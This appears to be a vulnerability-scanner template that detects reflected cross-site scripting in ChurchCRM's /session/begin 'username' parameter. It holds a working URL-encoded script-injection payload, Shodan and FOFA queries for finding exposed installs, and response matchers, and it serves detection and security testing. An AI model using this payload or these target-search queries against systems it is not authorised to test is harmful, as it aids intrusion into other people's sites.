id: churchcrm-xss

info:
  name: ChurchCRM - Reflected Cross-Site Scripting (XSS)
  author: pikpikcu
  severity: medium
  description: |
    A reflected cross-site scripting (XSS) vulnerability was discovered in ChurchCRM via the 'username' parameter in /session/begin.
  reference:
    - https://github.com/ChurchCRM/CRM/blob/91cfa8eb00aef724705f5e038c236c146c6cf3a6/src/session/templates/begin-session.php#L39
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cwe-id: CWE-79
    epss-score: 0.07062
    epss-percentile: 0.94141
    cpe: cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"ChurchCRM"
    fofa-query: app="ChurchCRM"
    product: ChurchCRM
    vendor: ChurchCRM
  tags: xss,churchcrm,reflected

http:
  - raw:
      - |
        GET /session/begin?username=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
